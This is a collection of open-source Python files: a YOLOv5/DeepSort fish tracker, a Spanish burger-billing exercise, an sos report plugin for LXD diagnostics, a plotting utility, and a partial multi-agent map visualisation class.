yolov5.utils.datasets import LoadImages\nfrom yolov5.utils.general import check_img_size, non_max_suppression, scale_coords\nfrom yolov5.utils.torch_utils import select_device, time_synchronized\nfrom deep_sort_pytorch.utils.parser import get_config\nfrom deep_sort_pytorch.deep_sort import DeepSort\nimport time\nimport cv2\nimport torch\nimport os\nimport numpy as np\nfrom yolov5.utils.augmentations import letterbox\n\nos.environ['CUDA_VISIBLE_DEVICES'] = '1'\n\npalette = (2 ** 11 - 1, 2 ** 15 - 1, 2 ** 20 - 1)\n\n\ndef xyxy_to_xywh(*xyxy):\n \"\"\"\" Calculates the relative bounding box from absolute pixel values. \"\"\"\n bbox_left = min([xyxy[0].item(), xyxy[2].item()])\n bbox_top = min([xyxy[1].item(), xyxy[3].item()])\n bbox_w = abs(xyxy[0].item() - xyxy[2].item())\n bbox_h = abs(xyxy[1].item() - xyxy[3].item())\n x_c = (bbox_left + bbox_w / 2)\n y_c = (bbox_top + bbox_h / 2)\n w = bbox_w\n h = bbox_h\n return x_c, y_c, w, h\n\n\ndef xyxy_to_tlwh(bbox_xyxy):\n tlwh_bboxs = []\n for i, box in enumerate(bbox_xyxy):\n x1, y1, x2, y2 = [int(i) for i in box]\n top = x1\n left = y1\n w = int(x2 - x1)\n h = int(y2 - y1)\n tlwh_obj = [top, left, w, h]\n tlwh_bboxs.append(tlwh_obj)\n return tlwh_bboxs\n\n\ndef compute_color_for_labels(label):\n \"\"\"\n Simple function that adds fixed color depending on the class\n \"\"\"\n color = [int((p * (label ** 2 - label + 1)) % 255) for p in palette]\n return tuple(color)\n\n\ndef draw_boxes(img, bbox, identities=None, offset=(0, 0)):\n for i, box in enumerate(bbox):\n x1, y1, x2, y2 = [int(i) for i in box]\n x1 += offset[0]\n x2 += offset[0]\n y1 += offset[1]\n y2 += offset[1]\n # box text and bar\n id = int(identities[i]) if identities is not None else 0\n color = compute_color_for_labels(id)\n label = '{}{:d}'.format(\"\", id)\n t_size = cv2.getTextSize(label, cv2.FONT_HERSHEY_PLAIN, 2, 2)[0]\n cv2.rectangle(img, (x1, y1), (x2, y2), color, 2)\n # cv2.rectangle(img, (x1, y1), (x1 + t_size[0] + 3, y1 + t_size[1] + 4), color, -1)\n cv2.rectangle(img, (x1, y1 - t_size[1]), (x1 + t_size[0], y1), color, -1)\n # cv2.putText(img, label, (x1, y1 + t_size[1] + 4), cv2.FONT_HERSHEY_PLAIN, 2, [255, 255, 255], 1)\n cv2.putText(img, label, (x1 + 4, y1 - 2), cv2.FONT_HERSHEY_PLAIN, 1, [255, 255, 255], 2)\n return img\n\n\ndef detect(opt):\n yolo_weights, deep_sort_weights, imgsz, evaluate, coordinates, device = \\\n opt.yolo_weights, opt.deep_sort_weights, opt.img_size, opt.evaluate, opt.coordinates, opt.device\n # initialize deepsort\n cfg = get_config()\n cfg.merge_from_file(opt.config_deepsort)\n attempt_download(deep_sort_weights, repo='mikel-brostrom/Yolov5_DeepSort_Pytorch')\n deepsort = DeepSort(cfg.DEEPSORT.REID_CKPT,\n max_dist=cfg.DEEPSORT.MAX_DIST, min_confidence=cfg.DEEPSORT.MIN_CONFIDENCE,\n nms_max_overlap=cfg.DEEPSORT.NMS_MAX_OVERLAP,\n max_iou_distance=cfg.DEEPSORT.MAX_IOU_DISTANCE,\n max_age=cfg.DEEPSORT.MAX_AGE, n_init=cfg.DEEPSORT.N_INIT, nn_budget=cfg.DEEPSORT.NN_BUDGET,\n use_cuda=True)\n # Initialize\n device = select_device(opt.device)\n half = device.type != 'cpu' # half precision only supported on CUDA\n # Load model\n model = attempt_load(yolo_weights, map_location=device) # load FP32 model\n stride = int(model.stride.max()) # model stride\n imgsz = check_img_size(imgsz, s=stride) # check img_size\n # names = model.module.names if hasattr(model, 'module') else model.names # get class names\n if half:\n model.half() # to FP16\n # Set Dataloader\n # dataset = LoadImages(source, img_size=imgsz)\n # Get names and colors\n # names = 
model.module.names if hasattr(model, 'module') else model.names\n    # Run inference\n    if device.type != 'cpu':\n        model(torch.zeros(1, 3, imgsz, imgsz).to(device).type_as(next(model.parameters())))  # run once\n    t0 = time.time()\n    # for frame_idx, (path, img, im0s, vid_cap) in enumerate(dataset):\n    cap = cv2.VideoCapture(r\"/home/lrz/Documents/Codes/yolov5_deepsort_test/video/Oculus_20210804_160601.mp4\")\n    while 1:\n        ret, img0 = cap.read()\n        if img0 is None:\n            break\n        img = letterbox(img0, 640, stride=32)[0]\n        # Convert\n        img = img.transpose((2, 0, 1))[::-1]  # HWC to CHW, BGR to RGB\n        img = np.ascontiguousarray(img)\n        img = torch.from_numpy(img).to(device)\n        img = img.half() if half else img.float()  # uint8 to fp16/32\n        img /= 255.0  # 0 - 255 to 0.0 - 1.0\n        if img.ndimension() == 3:\n            img = img.unsqueeze(0)\n        # Inference\n        # t1 = time_synchronized()\n        pred = model(img, augment=opt.augment)[0]\n        # Apply NMS\n        pred = non_max_suppression(\n            pred, opt.conf_thres, opt.iou_thres, classes=opt.classes, agnostic=opt.agnostic_nms)\n        # t2 = time_synchronized()\n        # Process detections\n        for i, det in enumerate(pred):  # detections per image\n            if det is not None and len(det):\n                # Rescale boxes from img_size to im0 size\n                det[:, :4] = scale_coords(img.shape[2:], det[:, :4], img0.shape).round()\n                xywh_bboxs = []\n                confs = []  # confidence that the detection is a fish\n                # Adapt detections to deep sort input format\n                for *xyxy, conf, cls in det:\n                    # to deep sort format\n                    x_c, y_c, bbox_w, bbox_h = xyxy_to_xywh(*xyxy)\n                    xywh_obj = [x_c, y_c, bbox_w, bbox_h]\n                    xywh_bboxs.append(xywh_obj)\n                    confs.append([conf.item()])\n                xywhs = torch.Tensor(xywh_bboxs)\n                confss = torch.Tensor(confs)\n                # pass detections to deepsort\n                outputs = deepsort.update(xywhs, confss, img0)\n                # draw boxes for visualization\n                if len(outputs) > 0:\n                    bbox_xyxy = outputs[:, :4]\n                    coordinates.append(bbox_xyxy)\n            else:\n                deepsort.increment_ages()\n    cap.release()\n    return coordinates\n","repo_name":"liurunsmileliu/yolov5_deepsort_fish","sub_path":"fish_track.py","file_name":"fish_track.py","file_ext":"py","file_size_in_byte":6760,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"7"}
{"seq_id":"13653102207","text":"# Billing for the purchase of products: \nimport math\n\nHAMB_POLLO = 5500\nHAMB_CARNE = 7400\nHAMB_PESCADO = 6000\nGASEOSA = 2200\nIVA = 0.19\n\nmenu = 0\nacumulador_hpollo = 0\nacumulador_hcarne = 0\nacumulador_hpescado = 0\nacumulador_gaseosa = 0\ntotal_gaseosa = 0\ntotal_hamburguesa_pollo = 0\ntotal_hamburguesa_carne = 0\ntotal_hamburgesa_pescado = 0\n\nwhile(menu != 5):\n\n    menu = \"\"\"\n    \\n***** BIENVENIDOS A LA HAMBURGUESERIA *****\\n\n    1. Hamburguesa de pollo\n    2. Hamburguesa de carne\n    3. Hamburguesa de pescado\n    4. Gaseosa\n    5. Salir\n\n    \\nElige una opcion: \"\"\"\n    \n    opcion = int(input(menu))\n\n    if opcion == 1:\n        cantidad_hamburguesa_pollo = int(input('Cuantas hamburguesas de pollo desea: '))\n        total_hamburguesa_pollo += HAMB_POLLO * cantidad_hamburguesa_pollo\n        acumulador_hpollo += cantidad_hamburguesa_pollo\n\n    elif opcion == 2:\n        cantidad_hamburguesa_carne = int(\n            input('Cuantas hamburguesas de carne desea: '))\n        total_hamburguesa_carne += HAMB_CARNE * cantidad_hamburguesa_carne\n        acumulador_hcarne += cantidad_hamburguesa_carne\n\n    elif opcion == 3:\n        cantidad_hamburguesa_pescado = int(\n            input(' Cuantas hamburguesas de pescado desea: '))\n        total_hamburgesa_pescado += HAMB_PESCADO * cantidad_hamburguesa_pescado\n        acumulador_hpescado += cantidad_hamburguesa_pescado\n\n    elif opcion == 4:\n        cantidad_gaseosa = int(input('Cuantas gaseosas desea: '))\n        total_gaseosa += GASEOSA * cantidad_gaseosa\n        acumulador_gaseosa += cantidad_gaseosa\n\n    else:\n        print('GRACIAS POR SU COMPRA')\n        break\n\nvalor_neto = total_hamburguesa_pollo + total_hamburguesa_carne + total_hamburgesa_pescado + total_gaseosa\ncon_iva = (valor_neto * IVA)\ntotal_pagar = math.ceil(valor_neto + con_iva)  # .ceil rounds up\n\nif(valor_neto >= 2200):\n    print('\\n--- Usted compro lo siguiente: ---')\n    print('************************************')\n    if(acumulador_hpollo >= 1):\n        print(f'{acumulador_hpollo} Hamburguesas de pollo a $ 5500 c/u = {total_hamburguesa_pollo}')\n\n    if(acumulador_hcarne >= 1): \n        print(f'{acumulador_hcarne} Hamburguesas de carne a $ 7400 c/u = {total_hamburguesa_carne}')\n\n    if(acumulador_hpescado >= 1):\n        print(f'{acumulador_hpescado} Hamburguesas de pescado a $ 6000 c/u = {total_hamburgesa_pescado}')\n\n    if(acumulador_gaseosa >= 1):\n        print(f'{acumulador_gaseosa} Gaseosas a $ 2200 c/u = {total_gaseosa}')\n\n    print(f'\\nSubtotal: $ {valor_neto}')\n    print(f'IVA: $ {con_iva}')\n    print(f'Total a pagar: $ {total_pagar}'.upper())\n\n    paga = int(input('\\nCancela con efectivo: $ '))\n    cambio = paga - total_pagar\n\n    print(f'Su cambio es: $ {round(cambio)}\\n')\n\nelse:\n    print('No escogio ninguna opción')\n","repo_name":"yoma75/ejercicios-de-python","sub_path":"numeros/hamburgeseria.py","file_name":"hamburgeseria.py","file_ext":"py","file_size_in_byte":2812,"program_lang":"python","lang":"es","doc_type":"code","stars":2,"dataset":"github-code","pt":"7"}
{"seq_id":"18915627216","text":"from sos.report.plugins import Plugin, UbuntuPlugin, SoSPredicate\n\n\nclass LXD(Plugin, UbuntuPlugin):\n\n    short_desc = 'LXD container hypervisor'\n    plugin_name = 'lxd'\n    profiles = ('container',)\n    packages = ('lxd',)\n    commands = ('lxc', 'lxd',)\n\n    def setup(self):\n\n        lxd_kmods = [\n            'bpfilter',\n            'ebtable_filter',\n            'ebtables',\n            'ip6table_filter',\n            'ip6table_mangle',\n            'ip6table_nat',\n            'ip6table_raw',\n            'ip6_tables',\n            'iptable_filter',\n            'iptable_mangle',\n            'iptable_nat',\n            'iptable_raw',\n            'nf_nat',\n            'nf_tables',\n        ]\n\n        lxd_pred = SoSPredicate(self, kmods=lxd_kmods,\n                                required={'kmods': 'all'})\n\n        lxd_pkg = self.policy.package_manager.pkg_by_name('lxd')\n        if lxd_pkg and lxd_pkg['pkg_manager'] == 'snap':\n            self.add_cmd_output(\"lxd.buginfo\", pred=lxd_pred)\n\n            self.add_copy_spec([\n                '/var/snap/lxd/common/config',\n                '/var/snap/lxd/common/global-conf',\n                '/var/snap/lxd/common/lxc/local.conf',\n                '/var/snap/lxd/common/lxd/logs/*/*.conf',\n            ])\n\n            if not self.get_option(\"all_logs\"):\n                self.add_copy_spec([\n                    '/var/snap/lxd/common/lxd/logs/*.log',\n                    '/var/snap/lxd/common/lxd/logs/*/*.log',\n                ])\n            else:\n                self.add_copy_spec([\n
                    '/var/snap/lxd/common/lxd/logs/**',\n                ])\n        else:\n            self.add_copy_spec([\n                \"/etc/default/lxd-bridge\",\n                \"/var/log/lxd/*\"\n            ])\n\n        self.add_cmd_output([\n            \"lxc image list\",\n            \"lxc list\",\n            \"lxc network list\",\n            \"lxc profile list\",\n            \"lxc storage list\"\n        ], pred=lxd_pred)\n\n        self.add_cmd_output([\n            \"find /var/lib/lxd -maxdepth 2 -type d -ls\",\n        ], suggest_filename='var-lxd-dirs.txt')\n\n# vim: set et ts=4 sw=4 :\n","repo_name":"sosreport/sos","sub_path":"sos/report/plugins/lxd.py","file_name":"lxd.py","file_ext":"py","file_size_in_byte":2156,"program_lang":"python","lang":"en","doc_type":"code","stars":470,"dataset":"github-code","pt":"7"}
{"seq_id":"38687557562","text":"import os.path\n\n# the project's root directory.\nROOT_DIR = os.path.dirname(os.path.abspath(__file__))\n\n# the time (in seconds) between each tick of the ambience emitter.\nEMITTER_TICK = 1\n\n# file extensions allowed for upload.\nAUDIO_UPLOAD_EXTENSIONS = ['.ogg', '.mp3', '.wav']\nIMAGE_UPLOAD_EXTENSIONS = ['.jpg', '.png', '.gif']\n","repo_name":"wintermute-cell/ambimancer","sub_path":"definitions.py","file_name":"definitions.py","file_ext":"py","file_size_in_byte":327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
{"seq_id":"43237342917","text":"#!/usr/bin/env python3\n# -*- coding : utf-8 -*-\n\nimport sys\nimport select\nimport time\nfrom matplotlib import pyplot as plt\nimport matplotlib.animation as animation\n\ndef datafeed(delta=10):\n    last_draw = 0\n    xdata = []\n    ydata = []\n    \n    while True:\n        i, o, e = select.select([sys.stdin], [], [], 1)\n        \n        if i:\n            line = sys.stdin.readline()\n            if line:\n                sys.stdout.write(line)\n                data = [float(a.strip()) for a in line.strip().split(\",\")]\n                xdata.append(data[0])\n                ydata.append(data[1:])\n\n                if time.time() - last_draw > delta:\n                    last_draw = time.time()\n                    yield xdata, ydata\n            else:\n                yield xdata, ydata\n                break\n\ndef main():\n    line = sys.stdin.readline()\n    sys.stdout.write(line)\n\n    headers = [a.strip() for a in line.strip().split(\",\")]\n\n    fig, ax = plt.subplots()\n    ax.set_xlabel(headers[0])\n    \n\n    for xdata, ydata in datafeed():\n        plt.cla()\n        plt.plot(xdata, ydata)\n        plt.legend(labels=headers[1:])\n        plt.xlabel(headers[0])\n        plt.show(block=False)\n        plt.show()\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"LucasSeguinot/m2-sv3","sub_path":"graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":1269,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
{"seq_id":"16658023286","text":"import os\nimport pickle\nimport argparse\nimport itertools\nfrom tqdm import tqdm\nfrom datetime import datetime\n\nimport numpy as np\n\nimport colorsys\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nimport matplotlib.gridspec as gridspec\nimport matplotlib.patches as patches\nfrom matplotlib.textpath import TextPath\nfrom matplotlib.font_manager import FontProperties\nimport imageio\n\nfrom GameLogic import Game, Point\n\ncustom_preamble = {\n    \"text.usetex\": True,\n    \"text.latex.preamble\": [\n        r\"\\usepackage{amsmath}\",  # for the align environment\n    ],\n}\nplt.rcParams.update(custom_preamble)\nmpl.use('TkAgg')\n\n\ndef print_maps(maps, fill='\\u2590\\u2588\\u258C'):\n    \"\"\"\n    Print one or multiple maps to console (Developer Tool)\n    :param maps: (boolean) numpy array with shape [maps_count, size_x, size_y]\n    :param fill: Define 3 characters for a true value
 (optional. default: 1/2 right block + 1 block + 1/2 left block)\n    :return:\n    \"\"\"\n    if maps.ndim == 2:\n        maps = np.expand_dims(maps, 0)\n\n    if maps.ndim != 3:\n        raise ValueError('Invalid number of dimensions')\n\n    print('\\u250f' + '\\u2501' * (maps.shape[2] * 3) + '\\u2513')\n    for i, layer in enumerate(maps):\n        if i > 0:\n            print('\\u2523' + '\\u2501' * (maps.shape[2] * 3) + '\\u252B')\n        for row in layer:\n            print('\\u2503', end='')\n            for cell in row:\n                if cell:\n                    print(fill, end='')\n                else:\n                    print('   ', end='')\n            print('\\u2503')\n    print('\\u2517' + '\\u2501' * (maps.shape[2] * 3) + '\\u251B')\n\n\ndef fig_to_data(fig):\n    \"\"\"\n    Convert a whole matplotlib figure to numpy array of pixels\n    :param fig: matplotlib figure\n    :return: numpy array with shape [height, width, 3] (3 for RGB)\n    \"\"\"\n    fig.canvas.draw()\n    w, h = fig.canvas.get_width_height()\n\n    buf = np.frombuffer(fig.canvas.tostring_rgb(), dtype=np.uint8)\n    buf.shape = (h, w, 3)\n\n    buf = np.roll(buf, 3, axis=2)\n    return buf\n\n\nclass Visualisation:\n    def __init__(self, input_maps, map_size, agent_count, view_padding, view_reduced=False,\n                 truth_obstacles=None, dt='', i_game=None, scores=None, reached=None):\n        self._map_size_x = map_size[0]\n        self._map_size_y = map_size[1]\n        self._view_padding = view_padding\n        self._view_size_x = view_padding[0] + 1 + view_padding[1] if view_reduced else 0\n        self._view_size_y = view_padding[2] + 1 + view_padding[3] if view_reduced else 0\n        self._view_reduced = view_reduced\n        self._agent_count = agent_count\n        self.time_steps = len(input_maps)\n        self._next_step = False\n        self._dt = datetime.now().strftime('%Y-%m-%d-%H-%M-%S') if dt == '' else dt\n        self._i_game = i_game\n        self._scores = scores\n        self._reached = reached\n\n        # Modify given input_map for further usage\n        input_maps = np.array(input_maps)\n        if not view_reduced:\n            # If field of view for agents is not reduced just force input_maps to the right shape\n            # and set full_maps equal to it because input maps are the full maps\n            self._input_maps = np.reshape(input_maps,\n                                          (self.time_steps, agent_count, self._map_size_x, self._map_size_y))\n            self._full_maps = self._input_maps\n        else:\n            # Separate the local field of view maps and global current and aim positions\n            self._input_maps = np.reshape(input_maps[:, :, 0:self._view_size_x * self._view_size_y],\n                                          (self.time_steps, agent_count, self._view_size_x, self._view_size_y))\n            self._current_pos = (input_maps[:, :, -4:-2] * map_size).round().astype('int64')\n            self._aim_pos = (input_maps[:, :, -2:] * map_size).round().astype('int64')\n            if np.unique(self._aim_pos, axis=0).shape[0] > 1:\n                Warning('Warning: Aim positions changed over time')\n\n            # Create full maps of the environment and start with an empty matrix\n            # The size of a single map is padded to apply the agent's field of view even if an agent stands close to a corner\n            # Shape: (time_steps, agent_counts, X, Y)\n            self._full_maps = np.zeros((self.time_steps,\n                                        self._agent_count,\n                                        view_padding[0] + self._map_size_x + view_padding[1],\n                                        view_padding[2] + self._map_size_y + view_padding[3]))\n\n            # Create a list of indices of all cells in full_maps to put input_maps into it at the right positions later\n            # Shape: (4, time_steps * agent_counts * view_size_x * view_size_y)\n            indices = np.array(list(itertools.product(np.arange(self.time_steps),\n                                                      np.arange(agent_count),\n                                                      np.arange(self._view_size_x),\n                                                      np.arange(self._view_size_y)))).T\n\n            # Add current agent positions as offset to indices to bring the smaller input_maps to the right positions\n            indices[2] += 
np.repeat(self._current_pos[:, :, 0], self._view_size_x * self._view_size_y) # x offset\n indices[3] += np.repeat(self._current_pos[:, :, 1], self._view_size_x * self._view_size_y) # y offset\n\n # Fill the full maps with values from the input maps at the previously desired positions\n self._full_maps[indices[0], indices[1], indices[2], indices[3]] = self._input_maps.flatten()\n\n # Crop out the padding of the full maps\n self._full_maps = self._full_maps[:, :, view_padding[2]:-view_padding[3], view_padding[0]:-view_padding[1]]\n\n # Obstacles\n self._obstacle_maps = (self._full_maps == 0.25)\n if not np.all(np.isin(np.count_nonzero(self._obstacle_maps, axis=(0, 1)), [0, self.time_steps * agent_count])):\n Warning('Warning: Positions of obstacles changed over time or are different for different agents')\n if isinstance(truth_obstacles, type(None)):\n self._obstacle_pos = np.argwhere(np.any(self._obstacle_maps, axis=(0, 1)))\n else:\n if len(truth_obstacles) > 0:\n self._obstacle_pos = np.unique(truth_obstacles, axis=0)\n else:\n self._obstacle_pos = np.array([], dtype='int64')\n\n # Others Position\n self._others_maps = (self._full_maps == 0.5)\n\n # Aim Positions\n self._aim_maps = (self._full_maps == 0.75)\n if not np.all(np.isin(np.count_nonzero(self._aim_maps, axis=0), [0, self.time_steps])):\n Warning('Warning: Aim maps changed over time')\n\n # Current Positions\n self._current_maps = (self._full_maps == 1.0)\n if np.any(np.count_nonzero(self._current_maps, axis=(2, 3)) > 1):\n Warning('Warning: At least one time step there are several positions for one or more agents')\n elif np.any(np.count_nonzero(self._current_maps, axis=(2, 3)) < 1):\n Warning('Warning: At least at one time step for one or more agents the positions are missing')\n\n # # Agent status includes 'aim achieved' (a), 'self inflicted accident' (s), 'third-party fault accident' (3)\n # # and 'time out' (t) # TODO: Agent status\n # self._agents_conditions = np.zeros(self._agent_count, dtype=np.dtype('U1'))\n\n # Color\n self._color_hue_offset = np.random.uniform()\n\n def get_maps_for_agent(self, time_step=-1, agent=0, plot_input=False):\n \"\"\"\n Return the map for agent X's point of view including: obstacles, own aim position,\n own current position (, own next position), others current position (, others next position).\n :param time_step:\n :param agent: id number of agent\n :param plot_input:\n :return: map as boolean array with shape [4 or 6, size_x, size_y]\n \"\"\"\n obstacles = self._obstacle_maps[time_step, agent]\n aim_map = self._aim_maps[time_step, agent]\n cur_map = self._current_maps[time_step, agent]\n # nxt_map = ... 
TODO: Next step\n        others_cp = self._others_maps[time_step, agent]\n        full_map = self._full_maps[time_step, agent]\n        input_map = self._input_maps[time_step, agent]\n\n        # If the field of view is reduced, add global positions to the reduced input map\n        if self._view_reduced:\n            # get global positions, concatenate them into a vector and add a white border above\n            # -> size = [2, 4]\n            c_pos = self._current_pos[time_step, agent] / [self._map_size_x, self._map_size_y]\n            a_pos = self._aim_pos[time_step, agent] / [self._map_size_x, self._map_size_y]\n            positions = np.concatenate([c_pos, a_pos]).reshape(1, -1)\n            positions = np.concatenate([np.ones((1, positions.shape[1])), positions], axis=0)\n\n            # duplicate each pixel in input_map and positions to force divisibility by two\n            input_map = input_map.repeat(2, axis=0).repeat(2, axis=1)\n            positions = positions.repeat(2, axis=0).repeat(2, axis=1)\n\n            # center-align both\n            size_diff = input_map.shape[1] - positions.shape[1]\n            if size_diff < 0:  # position vector is longer than input_map width\n                # add placeholder left and right to input_map\n                input_map = np.concatenate([np.ones((input_map.shape[0], int(-0.5 * size_diff))),\n                                            input_map,\n                                            np.ones((input_map.shape[0], int(-0.5 * size_diff)))], axis=1)\n            elif size_diff > 0:  # position vector is shorter than input_map width\n                # add placeholder left and right to positions\n                positions = np.concatenate([np.ones((4, int(0.5 * size_diff))),\n                                            positions,\n                                            np.ones((4, int(0.5 * size_diff)))], axis=1)\n\n            # now concatenate both\n            input_map = np.concatenate([input_map, positions], axis=0)\n\n            # make shape of input_map quadratic\n            size_diff = input_map.shape[0] - positions.shape[1]\n            if size_diff < 0:  # concatenated input_map is wider than high\n                input_map = np.concatenate([np.ones((int(-0.5 * size_diff), input_map.shape[1])),\n                                            input_map,\n                                            np.ones((int(-0.5 * size_diff), input_map.shape[1]))], axis=0)\n            elif size_diff > 0:  # concatenated input_map is higher than wide\n                input_map = np.concatenate([np.ones((input_map.shape[0], int(0.5 * size_diff))),\n                                            input_map,\n                                            np.ones((input_map.shape[0], int(0.5 * size_diff)))], axis=1)\n\n        if plot_input:\n            agent_map = [obstacles, aim_map, cur_map, others_cp, full_map, input_map]  # TODO: Next step\n        else:\n            agent_map = [obstacles, aim_map, cur_map, others_cp]  # TODO: Next step\n\n        # TODO: Next step\n        # if self._next_step:\n        #     others_np = np.any(self.get_filtered_map(layer='n'), axis=0)  # next positions of other agents\n        #     others_np = others_np & ~self.get_filtered_map(agent=agent, layer='n')  # subtract own next position\n        #     agent_map = np.concatenate((agent_map, others_np))\n\n        return agent_map\n\n    def _get_plot_color(self, agent, next_step=False):\n        \"\"\"\n        Return the color for an agent\n        :param agent: id number of agent\n        :param next_step:\n        :return: rgb value\n        \"\"\"\n        hue = agent / self._agent_count + self._color_hue_offset\n        saturation = 1.0 if not next_step else 0.1\n        value = 0.7 if not next_step else 0.9\n        return colorsys.hsv_to_rgb(hue, saturation, value)\n\n    def _plot_map_border(self, ax):\n        \"\"\"\n        Plot a black border around a map\n        :param ax: matplotlib axis / subplot\n        :return:\n        \"\"\"\n        border = patches.Rectangle((0, 0), self._map_size_y, self._map_size_x, linewidth=5, edgecolor='black',\n                                   facecolor='none')\n        ax.add_patch(border)\n\n    def _plot_view_border(self, ax, pos):\n        \"\"\"\n        Plot a grey border to visualize field of view of an agent\n        :param ax: matplotlib axis / subplot\n        :param pos: middle position of field (position of an agent)\n        :return:\n        \"\"\"\n        start = (pos[1] - self._view_padding[1],\n                 self._map_size_x - pos[0] - 1 - self._view_padding[3])\n        border = patches.Rectangle(start, self._view_size_y, self._view_size_x, linewidth=2, edgecolor='grey',\n                                   facecolor='none')\n        ax.add_patch(border)\n\n    def _plot_rect_at_pos(self, ax, x, y, color):\n        \"\"\"\n        Plot a rectangle to symbolize an agent or obstacle\n        :param ax: matplotlib axis / subplot\n        :param x: x position\n        :param y: y position\n        :param color: color of rectangle\n        :return:\n        \"\"\"\n        rect = patches.Rectangle((y, self._map_size_x - x - 1), 1, 1, linewidth=0,\n                                 edgecolor='none', facecolor=color)\n        ax.add_patch(rect)\n\n    def _plot_label(self, ax, x, y, text, color):\n        \"\"\"\n        Plot a text label\n        :param ax: matplotlib axis / subplot\n        :param x: x position\n        :param y: y position\n        :param text: text\n        :param color: color of text\n        :return:\n        \"\"\"\n        x = self._map_size_x - x - 1\n        prop = FontProperties(family='monospace', weight='black')\n        tp = TextPath((y, x), text, prop=prop, size=1)\n        polygon = tp.to_polygons()\n        for a in polygon:\n            patch = patches.Polygon(a, facecolor=color, edgecolor='black', linewidth=1, zorder=10)\n            ax.add_patch(patch)\n\n    def _plot_map(self, ax, map, color, plot_view_field=False, curr_pos=None):\n        \"\"\"\n        Plot a boolean map\n        :param ax: matplotlib axis / subplot\n        :param map: boolean numpy map\n        :param color: color of true blocks in boolean map\n        :param plot_view_field: if true, a grey border shows the field of view of an agent\n        :param curr_pos: position of agent to plot view field border at the right position\n        :return:\n        \"\"\"\n        # Plot map\n        for x in range(self._map_size_x):\n            for y in range(self._map_size_y):\n                if map[x, y]:\n                    self._plot_rect_at_pos(ax, x, y, color)\n\n        # Plot view field\n        if plot_view_field:\n            self._plot_view_border(ax, curr_pos)\n\n        # Plot border\n        self._plot_map_border(ax)\n\n        ax.set_ylim(0, self._map_size_x)\n        ax.set_xlim(0, self._map_size_y)\n        ax.set_aspect('equal')\n        ax.set_xticks([])\n        ax.set_yticks([])\n        ax.spines['top'].set_visible(False)\n        ax.spines['right'].set_visible(False)\n        
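# hiding the axes spines leaves only the border patch drawn by _plot_map_border visible\n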
ax.spines['bottom'].set_visible(False)\n ax.spines['left'].set_visible(False)\n\n def _plot_overview(self, fig, outer_grid=None, time_step=-1, plot_agent_status=True, plot_path=True,\n plot_input=False, plot_info=False, title=''):\n \"\"\"\n Plot a map all agents are included\n :param fig: matplotlib figure\n :param outer_grid: none or matplotlib grid this map should be plotted in\n :param time_step: time step to be plotted\n :param plot_agent_status: plot agents status (not implemented yet)\n :param plot_path: plot a line from start via each step to the current position\n :param plot_input: unused parameter. Just here to make list of parameters equal to _plot_all()\n :param plot_info: plot some information below the map\n :param title: title of plot\n :return: matplotlib figure\n \"\"\"\n if outer_grid is None:\n outer_grid = gridspec.GridSpec(1, 1, wspace=0, hspace=0)[0]\n grid = gridspec.GridSpecFromSubplotSpec(3, 1, subplot_spec=outer_grid,\n wspace=0.1, hspace=0.1, width_ratios=[1],\n height_ratios=[0, 5, 1 if plot_info else 0])\n else:\n grid = gridspec.GridSpecFromSubplotSpec(3, 1, subplot_spec=outer_grid,\n wspace=0.1, hspace=0.1, width_ratios=[1],\n height_ratios=[1 if plot_info else 0, 3, 1 if plot_info else 0])\n ax = plt.Subplot(fig, grid[1])\n\n # Obstacles\n for x, y in self._obstacle_pos:\n self._plot_rect_at_pos(ax, x, y, 'black')\n\n # Add maps of all agents to the plot\n for i_agent in range(self._agent_count):\n if self._view_reduced:\n start_pos = [self._current_pos[0, i_agent]]\n cur_pos = [self._current_pos[time_step, i_agent]]\n aim_pos = [self._aim_pos[time_step, i_agent]]\n else:\n start_pos = np.argwhere(self._current_maps[0, i_agent])\n cur_pos = np.argwhere(self._current_maps[time_step, i_agent])\n aim_pos = np.argwhere(self._aim_maps[time_step, i_agent])\n\n # nxt_map = ... 
TODO: Next step\n\n color = self._get_plot_color(i_agent, next_step=False)\n # color_next = self._get_plot_color(i_agent, next_step=True) # TODO: Next step\n\n # Plot next position\n # TODO: Next step\n # if self._next_step:\n # self._plot_map(ax, nxt_map, color_next)\n\n # Plot current position\n for x, y in cur_pos:\n self._plot_rect_at_pos(ax, x, y, color)\n\n # Plot path\n if plot_path:\n hist = np.where(self._current_maps[0:time_step + 1, i_agent])\n offset = (1 / (self._agent_count + 1) * (i_agent + 1) * 0.5) - 0.25\n x = hist[2] + 0.5 + offset\n y = self._map_size_x - hist[1] - 0.5 + offset\n ax.plot(x, y, '-', color=color, zorder=0)\n\n # Plot start position\n for x, y in start_pos:\n self._plot_label(ax, x - 0.15, y + 0.2, \"S\", color)\n\n # Plot aim position\n for x, y in aim_pos:\n self._plot_label(ax, x - 0.15, y + 0.2, \"E\", color)\n\n # # Plot agent status # TODO: Agent status\n # if plot_agent_status:\n # for status, symbol in zip(['a', 's', '3', 't'], ['\\u2713', '\\u2717', '\\u2717', '\\u2717']): # \\u2620\n # if self._agents_conditions[i_agent] == status:\n # for x, y in self._current_maps[time_step, i_agent]:\n # self._plot_label(ax, x - 0.15, y + 0.2, symbol, 'black')\n\n # Plot Border\n self._plot_map_border(ax)\n\n ax.set_ylim(0, self._map_size_x)\n ax.set_xlim(0, self._map_size_y)\n ax.set_aspect('equal')\n ax.set_xticks([])\n ax.set_yticks([])\n ax.axis('off')\n ax.set_title(title, fontsize=15)\n fig.add_subplot(ax)\n\n # Add info box below if wanted\n if plot_info:\n ax = plt.Subplot(fig, grid[2])\n self._plot_info(ax, time_step)\n fig.add_subplot(ax)\n\n return fig\n\n def _plot_all(self, fig, time_step=-1, plot_agent_status=True, plot_path=True, plot_input=False,\n plot_info=False, overview_title='Overview'):\n \"\"\"\n Plot a visualisation with a big overview map and\n small maps for all agents for all types of object in the environment\n :param fig: matplotlib figure\n :param time_step: time step to be plotted\n :param plot_agent_status: plot agents status (not implemented yet)\n :param plot_path: plot a line from start via each step to the current position\n :param plot_input: show also heatmaps to visualize network input\n :param plot_info: plot some information below the overview map\n :param overview_title: title of overview map\n :return: matplotlib figure\n \"\"\"\n # Create outer grid\n outer = gridspec.GridSpec(1, 2, wspace=0.1, hspace=0.1, width_ratios=[0.382, 0.618])\n 